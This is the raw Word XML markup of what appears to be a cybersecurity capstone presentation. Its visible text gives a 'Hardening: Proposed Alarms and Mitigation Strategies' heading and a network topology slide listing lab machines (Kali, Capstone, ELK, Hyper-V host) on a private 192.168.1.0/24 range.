                                  <a:pt x="11838" y="164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11838" y="816"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11825" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11790" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11738" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11675" y="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2130" y="4296"/>
                            <a:ext cx="11838" cy="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E4AF4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="230"/>
                                <w:ind w:left="295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36"/>
                                </w:rPr>
                                <w:t>Hardening</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>: Proposed Alarms and Mitigation Strategies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38935A" id="Group 123" o:spid="_x0000_s1047" style="position:absolute;margin-left:106.5pt;margin-top:214.8pt;width:591.9pt;height:48.95pt;z-index:-15719936;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="2130,4296" coordsize="11838,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">
                <v:shape id="Freeform 125" o:spid="_x0000_s1048" style="position:absolute;left:2130;top:4296;width:11838;height:979;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="11838,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" path="m11675,979l163,979,100,966,48,931,13,879,,816,,164,13,100,48,48,100,13,163,,11675,r62,13l11790,48r36,53l11838,164r,652l11825,879r-35,52l11738,966r-63,13xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11675,5275;163,5275;100,5262;48,5227;13,5175;0,5112;0,4460;13,4396;48,4344;100,4309;163,4296;11675,4296;11737,4309;11790,4344;11826,4397;11838,4460;11838,5112;11825,5175;11790,5227;11738,5262;11675,5275" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 124" o:spid="_x0000_s1049" type="#_x0000_t202" style="position:absolute;left:2130;top:4296;width:11838;height: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6DEE4AF4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="230"/>
                          <w:ind w:left="295"/>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>Hardening</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>: Proposed Alarms and Mitigation Strategies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1FC148" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68469D41" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780BA5FE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EC0A3D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0751C7DD" w14:textId="61AE429D" w:rsidR="00377979" w:rsidRDefault="000A2543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5E79D91B" wp14:editId="7B616009">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>190500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="132" name="Lin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57BF70" id="Line 122" o:spid="_x0000_s1026" style="position:absolute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15pt" to="698.4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" strokecolor="#a8b6bf">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D2CF1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21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62621A93" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D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7169536" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="038AD2DA" wp14:editId="7FC7BA33">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>274389</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>274949</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="8597516" cy="4594902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516" cy="459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2715C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE3CF35" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5090F699" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64513D52" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAA68A7" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737D9DCA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351B4765" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728EAEA7" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CF2903" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34654B1B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CFF1DAE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="84"/>
        <w:ind w:left="457" w:right="563"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Network Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52227201" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7C6962" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E37FFC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B1C6E8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26287C63" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A38AE17" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7B972C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6365B2" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23416177" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E44D931" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524CE0CD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A58F48F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71AAF4DA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46804668" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4219DD52" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="96"/>
        <w:ind w:right="246"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C6EF3" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:sectPr w:rsidR="00377979">
          <w:pgSz w:w="14400" w:h="8100" w:orient="landscape"/>
          <w:pgMar w:top="720" w:right="180" w:bottom="0" w:left="280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10494A27" w14:textId="391D55D6" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="Heading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2096" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C3F41E5" wp14:editId="47F26519">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>115570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>770255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6699885" cy="3897630"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="12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9885" cy="3897630"/>
                          <a:chOff x="182" y="1213"/>
                          <a:chExt cx="10551" cy="6138"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="130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181" y="1213"/>
                            <a:ext cx="10551" cy="6138"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="1C8AE6">
                              <a:alpha val="1451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" y="1213"/>
                            <a:ext cx="9830" cy="6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422A1" id="Group 119" o:spid="_x0000_s1026" style="position:absolute;margin-left:9.1pt;margin-top:60.65pt;width:527.55pt;height:306.9pt;z-index:-16144384;mso-position-horizontal-relative:page" coordorigin="182,1213" coordsize="10551,61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">
                <v:rect id="Rectangle 121" o:spid="_x0000_s1027" style="position:absolute;left:181;top:1213;width:10551;height:6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" fillcolor="#1c8ae6" stroked="f">
                  <v:fill opacity="9509f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0" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:542;top:1213;width:9830;height:6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">
                  <v:imagedata r:id="rId8" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t>Network Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AE86F8" w14:textId="124AA931" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial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11CFC257" wp14:editId="3F1E8E6C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>102235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="128" name="Lin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6C39E4" id="Line 118" o:spid="_x0000_s1026" style="position:absolute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8.05pt" to="698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" strokecolor="#595959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A5F3668" wp14:editId="01D7E4D7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7049135</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>367665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1913890" cy="3794760"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="12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13890" cy="3794760"/>
                          <a:chOff x="11101" y="579"/>
                          <a:chExt cx="3014" cy="5976"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="126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00" y="586"/>
                            <a:ext cx="2880" cy="5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Text Box 116"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="11112" y="586"/>
                            <a:ext cx="2995" cy="5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BD8E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8FB2938" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:spacing w:before="3"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="66691505" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="218" w:lineRule="auto"/>
                                <w:ind w:left="277" w:right="1063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sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Network </w:t>
                              </w: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Address Range: 192.168.1.0/24</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="68584C30" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="233" w:lineRule="exact"/>
                                <w:ind w:left="277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Netmask: 255.</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/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255.25..</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/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0</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="1E6FB271" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="252" w:lineRule="exact"/>
                                <w:ind w:left="277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Gateway: 192.168.1.1</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="3E1D6D32" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:spacing w:before="10"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:b/>
                                  <w:sz w:val="19"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="09F2F055" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="304" w:lineRule="exact"/>
                                <w:ind w:left="277"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Machines:</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="47FAA633" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="239" w:lineRule="exact"/>
                                <w:ind w:left="277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IPv4: 192.168.1.90</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="75C6CAA4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="7" w:line="218" w:lineRule="auto"/>
                                <w:ind w:left="277" w:right="1311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OS: Linux Hostname: Kali</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="6658E6CB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:spacing w:before="10"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:b/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="7B9AE544" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="252" w:lineRule="exact"/>
                                <w:ind w:left="277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IPv4: 192.168.1.105</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="005A54A6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="7" w:line="218" w:lineRule="auto"/>
                                <w:ind w:left="277" w:right="819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OS: Linux Hostname:</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:b/>
                                  <w:spacing w:val="-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Capstone</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="246E09FF" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:spacing w:before="10"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:b/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="2C823D21" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="252" w:lineRule="exact"/>
                                <w:ind w:left="277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IPv4: 192.168.1.100</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="1B6FD369" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="7" w:line="218" w:lineRule="auto"/>
                                <w:ind w:left="277" w:right="1303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OS: Linux Hostname: ELK</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="2C0E345E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                              <w:pPr>
                                <w:spacing w:before="10"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:b/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="37FBD018" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:line="252" w:lineRule="exact"/>
                                <w:ind w:left="277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IPv4: 192.168.1.1</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="526AE94E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="7" w:line="218" w:lineRule="auto"/>
                                <w:ind w:left="277" w:right="279"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Robo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0"/>
                                </w:rPr>
                                <w:t>OS: Windows 10 Hostname: Azure Hyper-V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5F3668" id="Group 115" o:spid="_x0000_s1050" style="position:absolute;margin-left:555.05pt;margin-top:28.95pt;width:150.7pt;height:298.8pt;z-index:-15717376;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="11101,579" coordsize="3014,59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">
                <v:shape id="Picture 117" o:spid="_x0000_s1051" type="#_x0000_t75" style="position:absolute;left:11100;top:586;width:2880;height:5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">
                  <v:imagedata r:id="rId10" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 116" o:spid="_x0000_s1052" type="#_x0000_t202" style="position:absolute;left:11112;top:586;width:2995;height:5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" filled="f" strokecolor="#dbd8e8">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="48FB2938" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:spacing w:before="3"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="66691505" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="218" w:lineRule="auto"/>
                          <w:ind w:left="277" w:right="1063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sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Network </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>Address Range: 192.168.1.0/24</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="68584C30" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="233" w:lineRule="exact"/>
                          <w:ind w:left="277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Netmask: 255.</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>255.25..</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>0</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1E6FB271" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="252" w:lineRule="exact"/>
                          <w:ind w:left="277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Gateway: 192.168.1.1</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3E1D6D32" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:spacing w:before="10"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="19"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="09F2F055" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="304" w:lineRule="exact"/>
                          <w:ind w:left="277"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Machines:</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="47FAA633" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="239" w:lineRule="exact"/>
                          <w:ind w:left="277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IPv4: 192.168.1.90</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="75C6CAA4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="7" w:line="218" w:lineRule="auto"/>
                          <w:ind w:left="277" w:right="1311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OS: Linux Hostname: Kali</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6658E6CB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:spacing w:before="10"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="7B9AE544" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="252" w:lineRule="exact"/>
                          <w:ind w:left="277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IPv4: 192.168.1.105</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="005A54A6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="7" w:line="218" w:lineRule="auto"/>
                          <w:ind w:left="277" w:right="819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OS: Linux Hostname:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:spacing w:val="-1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Roboto"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>Capstone</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="246E09FF" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:spacing w:before="10"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="2C823D21" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="252" w:lineRule="exact"/>
                          <w:ind w:left="277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IPv4: 192.168.1.100</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1B6FD369" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="7" w:line="218" w:lineRule="auto"/>
                          <w:ind w:left="277" w:right="1303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OS: Linux Hostname: ELK</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2C0E345E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:spacing w:before="10"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="37FBD018" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="252" w:lineRule="exact"/>
                          <w:ind w:left="277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IPv4: 192.168.1.1</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="526AE94E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="7" w:line="218" w:lineRule="auto"/>
                          <w:ind w:left="277" w:right="279"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>OS: Windows 10 Hostname: Azure Hyper-V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1B71377" wp14:editId="3F60F059">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4368800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="124" name="Lin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EE3028" id="Line 114" o:spid="_x0000_s1026" style="position:absolute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44pt" to="698.4pt,34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" strokecolor="#a8b6bf">
